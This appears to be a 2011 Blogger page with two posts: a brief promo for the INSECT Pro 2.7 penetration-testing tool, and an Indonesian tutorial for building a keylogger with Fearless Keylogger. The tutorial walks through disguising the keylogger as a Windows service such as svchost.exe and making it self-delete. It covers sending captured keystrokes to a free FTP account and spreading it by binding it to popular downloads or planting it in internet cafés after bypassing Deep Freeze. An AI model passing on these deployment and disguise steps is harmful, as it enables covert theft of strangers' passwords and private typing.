INSECT Pro 2.7 - Ultimate is here! This penetration security auditing and testing software solutionis designed to allow organizations of all sizes mitigate, monitor and manage the latest security threats vulnerabilities and implement active security policies by performing penetration tests across their infrastructure and applications. This is a partial list of the major changes implanted in version 2.7

- Available targets now has a submenu under right-click button
- Check update function added in order to verify current version
- Threading support for GET request
- Module log added and functional
- Sniffer support added
- 50 Remote exploits added
- Project saved on userland - Application Data special folder
- Executed module windows added and functionality for it
- AgentConnect now use telnetlib

DOWNLOAD INSECT Pro 2.7

Article Source
Read more

Keylogger With FEARLESS KEYLOGGER

,
Pernah dengar keylogger??
keylogger adalah sejenis program yang mampu menangkap hasil ketikan keyboard user di sebuah computer yang udah ter install ma software ini..
keylogger bisa dimasukkan dalam kategori virus,Trojan …merupakan salah satu program andalan hacker (umumnya sih yang black hat ) he he he…ada berbagai macam program keylogger contohnya KGB Keylogger,Ardamax Keylogger,Fearless Keylogger..masing2 mempunyai keistimewaan dan kekurangan…tapi disini ane gak mungkin jelasin satu persatu…ane Cuma mau jelasin tentang cara membuat keylogger yang mudah menggunakan fearless keylogger…
langsung aja oms ..
Fearless keylogger termasuk program pembuat koetlogger sederhana yang sangat mantabss hasilnya..menurut ane sih.. hi hi hi..bisa didapatkan disini
Langsung ajah kagak usah banyak cing-cong…jalankan programnya,maka akan muncul tampilan seperti berikut


Dibagian server name isi aja nama service windows biar menipu,kaya svchost.exe,winlogon.exe,spoolsv.exe atau apalah..(explore u’r brain brother..),dibagian registry key juga sama,trus di kolom “remove” file..di isi tulisan apa aja,ntu gunanya mematikan program keylogger secara otomatis bila di dalam server ftp kita ada file dengan nama yang kita tuliskan di kolom tersebut…< lho kok ada server Ftp segala??hush..diem dulu..ntar ane jelasin >,di bagian victim name diisi nama yang sama dengan nama di kolom “remove:” file; jadi misalkan di kolom “remove” file diisi remove_saya1.me,maka di kolom Victim name di isi saya1....dibagian “Upload dir” diisi directory tempat file log akan dikirim di server ftp kita…
Trus klik startup options ..maka akan mucul gambar seperti ini

Centrang aja semua pilihan disana..dan jangan lupa di bagian “melt Server” juga di centang..gunanya menghapus file keylogger setelah dijalankan ma user yang gak paham bahwa menjalankan file keylogger ntu sangat berbahaya..ho ho ho…
Trus klik logging options


Nah disini penjelasan kenapa diatas tadi ane sempat nyinggung tentang server ftp…bila belum punya server ftp bisa signup dulu disini kok
http://www.drivehq.com/secure/FreeSignup.aspx? Gratis..tis..tis
dah daftar??masukkan alamat ftp tadi di kolom ftp address ,contoh ftp.drivehq.com trus user name kamu dan password kamu…dibagian”when log gets” diisi bytes hasil ketikan yang akan dikirim ke server ftp..Nb:kalau bisa gak usah gede2..misal 100 bytes aja dah cukup lumayan kok,biar cepet dikirimnya…eits gak bingung lebih besar byte atawa kilobytes kan??he he he he.di kolom logfile diisi nama file log yang akan dikirim,misal bila diisi dengan nama warnetA.log..maka di server ftp kita nanti akan ada file dengan nama yang sama…trus klik “Build Server”..jadilah file keylogger kita tadi.. he he he ni contohnya…

cara pakai??pake trick yang menipu dunk..joinkan dengan sopware yang baru nge trend saat ini dengan program binded.exe,atau file joiner.exe, atau yab file binder.exe..kasih ke temen2 kamu atau upload ke internet biar pada di download…dan hoppla..mereka dapatkan program yang mereka inginkan + KEYLOGGER kamu..wakakakakak atau kalau cara yang licik,pasang di warnet,habisin dulu depfrezze nya,pasang,tutup dan tinggal panen hasil..atau bila warnetnya pake depfrezze terbaru versi 7 dan kita gak punya anti nya dijalankan aja,trus cabut..tunggu sampai ada user yang pake ..meski setelah mereka pakai trus restart kompie,hasil ketikan tetap melayang jauuuhhh ke server kita he he he..
sekian tutorial dari ane.
Read more
 

cvbn45's Blog Copyright © 2011 -- Template created by O Pregador -- Powered by Blogger